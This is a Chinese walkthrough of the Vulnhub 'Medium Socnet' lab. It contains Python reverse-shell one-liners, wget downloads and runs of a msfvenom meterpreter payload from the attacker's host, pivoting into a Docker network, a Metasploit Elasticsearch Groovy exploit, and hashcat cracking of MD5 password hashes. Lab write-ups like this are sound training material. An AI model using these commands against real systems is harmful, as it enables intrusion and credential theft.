Vulnhub之Medium Socnet详细测试过程

Medium Socnet

识别目标主机IP地址

1. Currently scanning: Finished!   |   Screen View: Unique Hosts                                                               
2.                                                                                                                              
3. 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                            
4. _____________________________________________________________________________
5.    IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
6. -----------------------------------------------------------------------------
7. 192.168.56.1    0a:00:27:00:00:06      1      60  Unknown vendor                                                            
8. 192.168.56.100  08:00:27:af:83:c9      1      60  PCS Systemtechnik GmbH                                                   
9. 192.168.56.254  08:00:27:87:d5:96      1      60  PCS Systemtechnik GmbH      

复制代码

利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.254
NMAP扫描

1. ┌──(kali㉿kali)-[~/Vulnhub/Socnet]
2. └─$ sudo nmap -sS -sV -sC -p- 192.168.56.254 -oN nmap_full_scan
3. Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-08 00:38 EDT
4. Nmap scan report for www.armour.local (192.168.56.254)
5. Host is up (0.00029s latency).
6. Not shown: 65533 closed tcp ports (reset)
7. PORT     STATE SERVICE VERSION
8. 22/tcp   open  ssh     OpenSSH 6.6p1 Ubuntu 2ubuntu1 (Ubuntu Linux; protocol 2.0)
9. | ssh-hostkey:
10. |   1024 cc5320b810db525f1602bcee572280e1 (DSA)
11. |   2048 0150f61f32e80dfc48383ec81bac2002 (RSA)
12. |   256 3bae9abdcbff8f546432ecbf38fdfe6b (ECDSA)
13. |_  256 774e8b207352a4ee931db385f225d755 (ED25519)
14. 5000/tcp open  http    Werkzeug httpd 0.14.1 (Python 2.7.15)
15. |_http-title: Leave a message
16. MAC Address: 08:00:27:87:D5:96 (Oracle VirtualBox virtual NIC)
17. Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

复制代码

NMAP扫描结果表明目标主机有2个开放端口：22（ssh)、5000（http)
获得Shell

1. ──(kali㉿kali)-[~/Vulnhub/Socnet]
2. └─$ gobuster dir -u http://192.168.56.254:5000 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.js,.html,.txt,.sh
3. ===============================================================
4. Gobuster v3.3
5. by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
6. ===============================================================
7. [+] Url:                     http://192.168.56.254:5000
8. [+] Method:                  GET
9. [+] Threads:                 10
10. [+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
11. [+] Negative Status codes:   404
12. [+] User Agent:              gobuster/3.3
13. [+] Extensions:              js,html,txt,sh,php
14. [+] Timeout:                 10s
15. ===============================================================
16. 2023/04/08 00:44:15 Starting gobuster in directory enumeration mode
17. ===============================================================
18. /admin                (Status: 200) [Size: 401]

复制代码

发现了/admin目录，而我们在namp结果知道目标运行Python环境
当输入正确的python代码时,比如print("jason"),返回结果：

1. Status:
3. Ran the code

复制代码

当故意输入有错误的python代码时，则返回结果：

1. Status:
3. Something went wrong with running the code

复制代码

因此接下来设法得到反向shell

1. python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

复制代码

这里不需要前面的python -c

1. import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.206",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

复制代码

1. ┌──(kali㉿kali)-[~/Vulnhub/Socnet]
2. └─$ sudo nc -nlvp 5555                                         
3. [sudo] password for kali:
4. listening on [any] 5555 ...
5. connect to [192.168.56.206] from (UNKNOWN) [192.168.56.254] 39946
6. /app # id
7. uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
8. /app # ip a
9. 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN
10.     link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
11.     inet 127.0.0.1/8 scope host lo
12.        valid_lft forever preferred_lft forever
13. 4: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP
14.     link/ether 02:42:ac:11:00:02 brd ff:ff:ff:ff:ff:ff
15.     inet 172.17.0.2/16 brd 172.17.255.255 scope global eth0
16.        valid_lft forever preferred_lft forever
17. /app #

复制代码

这应该是在容器中。
将编译后的nmap上传到目标容器中

1. /app # which wget
2. /usr/bin/wget
3. /app # cd /tmp
4. /tmp # wget http://192.168.56.206:8000/nmap
5. Connecting to 192.168.56.206:8000 (192.168.56.206:8000)
6. nmap                 100% |*******************************|  5805k  0:00:00 ETA
8. /tmp # chmod +x nmap
9. /tmp # ./nmap 172.17.0./16
10. /tmp # ./nmap 172.17.0.0/24
12. Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2023-04-08 05:00 UTC
13. Unable to find nmap-services!  Resorting to /etc/services
14. Cannot find nmap-payloads. UDP payloads are disabled.
15. Nmap scan report for 172.17.0.1
16. Cannot find nmap-mac-prefixes: Ethernet vendor correlation will not be performed
17. Host is up (0.000042s latency).
18. Not shown: 1288 closed ports
19. PORT   STATE SERVICE
20. 22/tcp open  ssh
21. MAC Address: 02:42:A1:9D:B7:15 (Unknown)
23. Nmap scan report for 172.17.0.3
24. Host is up (0.000044s latency).
25. Not shown: 1288 closed ports
26. PORT     STATE SERVICE
27. 9200/tcp open  wap-wsp
28. MAC Address: 02:42:AC:11:00:03 (Unknown)

复制代码

经过扫描发现172.17.0.3容器开放9200端口，运行elasticsearch服务
接下来利用metasploit工具生成meterpreter会话

1. ┌──(kali㉿kali)-[~/Vulnhub/Socnet]
2. └─$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.56.206 LPORT=6666 -f elf -o escalate.elf
3. [-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
4. [-] No arch selected, selecting arch: x86 from the payload
5. No encoder specified, outputting raw payload
6. Payload size: 123 bytes
7. Final size of elf file: 207 bytes
8. Saved as: escalate.elf

复制代码

将Mesfvenom工具生成的escalate.elf文件上传之目标容器（172.17.0.2）

1. /tmp # wget http://192.168.56.206:8000/escalate.elf
2. Connecting to 192.168.56.206:8000 (192.168.56.206:8000)
3. escalate.elf         100% |*******************************|   207   0:00:00 ETA
5. /tmp # chmod +x escalate.elf
6. /tmp # ./escalate.elf

复制代码

1. Module options (exploit/multi/handler):
3.    Name  Current Setting  Required  Description
4.    ----  ---------------  --------  -----------
7. Payload options (linux/x86/meterpreter/reverse_tcp):
9.    Name   Current Setting  Required  Description
10.    ----   ---------------  --------  -----------
11.    LHOST                   yes       The listen address (an interface may be specified)
12.    LPORT  4444             yes       The listen port
15. Exploit target:
17.    Id  Name
18.    --  ----
19.    0   Wildcard Target
23. View the full module info with the info, or info -d command.
25. msf6 exploit(multi/handler) > set LHOST 192.168.56.206
26. LHOST => 192.168.56.206
27. msf6 exploit(multi/handler) > set LPORT 6666
28. LPORT => 6666
29. msf6 exploit(multi/handler) > run
31. [*] Started reverse TCP handler on 192.168.56.206:6666
32. [*] Sending stage (1017704 bytes) to 192.168.56.254
33. [*] Meterpreter session 1 opened (192.168.56.206:6666 -> 192.168.56.254:53521) at 2023-04-08 01:11:37 -0400
35. meterpreter >

复制代码

在Kali Linux上成功得到meterpreter会话，接下里建立端口转发，到172.17.0.3的elasticservice端口

1. meterpreter > run autoroute -s 172.17.0.0/16
2. meterpreter > portfwd add -l 9200 -p 9200 -r 172.17.0.3
3. [*] Forward TCP relay created: (local) :9200 -> (remote) 172.17.0.3:9200
4. meterpreter > background
5. [*] Backgrounding session 1...
6. msf6 exploit(multi/handler) > search elasticsearch
8. Matching Modules
9. ================
11.    #  Name                                              Disclosure Date  Rank       Check  Description
12.    -  ----                                              ---------------  ----       -----  -----------
13.    0  exploit/multi/elasticsearch/script_mvel_rce       2013-12-09       excellent  Yes    ElasticSearch Dynamic Script Arbitrary Java Execution
14.    1  auxiliary/scanner/elasticsearch/indices_enum                       normal     No     ElasticSearch Indices Enumeration Utility
15.    2  exploit/multi/elasticsearch/search_groovy_script  2015-02-11       excellent  Yes    ElasticSearch Search Groovy Sandbox Bypass
16.    3  auxiliary/scanner/http/elasticsearch_traversal                     normal     Yes    ElasticSearch Snapshot API Directory Traversal
17.    4  exploit/multi/misc/xdh_x_exec                     2015-12-04       excellent  Yes    Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution
20. Interact with a module by name or index. For example info 4, use 4 or use exploit/multi/misc/xdh_x_exec
22. msf6 exploit(multi/handler) > use exploit/multi/elasticsearch/search_groovy_script
23. [*] No payload configured, defaulting to java/meterpreter/reverse_tcp
24. msf6 exploit(multi/elasticsearch/search_groovy_script) > show options
26. Module options (exploit/multi/elasticsearch/search_groovy_script):
28.    Name       Current Setting  Required  Description
29.    ----       ---------------  --------  -----------
30.    Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
31.    RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/us
32.                                          ing-metasploit.html
33.    RPORT      9200             yes       The target port (TCP)
34.    SSL        false            no        Negotiate SSL/TLS for outgoing connections
35.    TARGETURI  /                yes       The path to the ElasticSearch REST API
36.    VHOST                       no        HTTP server virtual host
39. Payload options (java/meterpreter/reverse_tcp):
41.    Name   Current Setting  Required  Description
42.    ----   ---------------  --------  -----------
43.    LHOST  10.0.2.15        yes       The listen address (an interface may be specified)
44.    LPORT  4444             yes       The listen port
47. Exploit target:
49.    Id  Name
50.    --  ----
51.    0   ElasticSearch 1.4.2
55. View the full module info with the info, or info -d command.
57. msf6 exploit(multi/elasticsearch/search_groovy_script) > set RHOSTS localhost
58. RHOSTS => localhost
59. msf6 exploit(multi/elasticsearch/search_groovy_script) > set LHOST 192.168.56.206
60. LHOST => 192.168.56.206
61. msf6 exploit(multi/elasticsearch/search_groovy_script) > set LPORT 8888
62. LPORT => 8888
63. msf6 exploit(multi/elasticsearch/search_groovy_script) > run
64. [*] Exploiting target 0.0.0.1
66. [*] Started reverse TCP handler on 192.168.56.206:8888
67. [*] Checking vulnerability...
68. [-] Exploit aborted due to failure: unknown: 0.0.0.1:9200 - Java has not been executed, aborting...
69. [*] Exploiting target 127.0.0.1
70. [*] Started reverse TCP handler on 192.168.56.206:8888
71. [*] Checking vulnerability...
72. [*] Discovering TEMP path...
73. [+] TEMP path on '/tmp'
74. [*] Discovering remote OS...
75. [+] Remote OS is 'Linux'
76. [*] Trying to load metasploit payload...
77. [*] Sending stage (58829 bytes) to 192.168.56.254
78. [+] Deleted /tmp/IVCQL.jar
79. [*] Meterpreter session 2 opened (192.168.56.206:8888 -> 192.168.56.254:55487) at 2023-04-08 01:17:49 -0400
80. [*] Session 2 created in the background.

复制代码

1. msf6 exploit(multi/elasticsearch/search_groovy_script) > sessions -l
3. Active sessions
4. ===============
6.   Id  Name  Type                    Information          Connection
7.   --  ----  ----                    -----------          ----------
8.   1         meterpreter x86/linux   root @ 172.17.0.2    192.168.56.206:6666 -> 192.168.56.254:53521 (172.17.0.2)
9.   2         meterpreter java/linux  root @ 2c3ee4ccef61  192.168.56.206:8888 -> 192.168.56.254:55487 (127.0.0.1)

复制代码

在172.17.0.3的shell中发现文件passwords

1. cat passwords
2. Format: number,number,number,number,lowercase,lowercase,lowercase,lowercase
3. Example: 1234abcd
4. john:3f8184a7343664553fcb5337a3138814
5. test:861f194e9d6118f3d942a72be3e51749
6. admin:670c3bbc209a18dde5446e5e6c1f1d5b
7. root:b3d34352fc26117979deabdf1b9b6354
8. jane:5c158b60ed97c723b673529b8a3cf72b

复制代码

并且给出了密码的格式：
number,number,number,number,lowercase,lowercase,lowercase,lowercase
数字数字数字数字数字小写字母小写字母小写字母
接下里用hashcat进行破解

1. (kali㉿kali)-[~/Vulnhub/Socnet]
2. └─$ hashcat --username -m 0 -a 3 hashes  -1 ?d -2 ?l ?1?1?1?1?2?2?2?2 --force
3. 5c158b60ed97c723b673529b8a3cf72b:1234jane                 
4. b3d34352fc26117979deabdf1b9b6354:1234pass                 
5. 670c3bbc209a18dde5446e5e6c1f1d5b:1111pass                 
6. 861f194e9d6118f3d942a72be3e51749:1234test      

复制代码

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！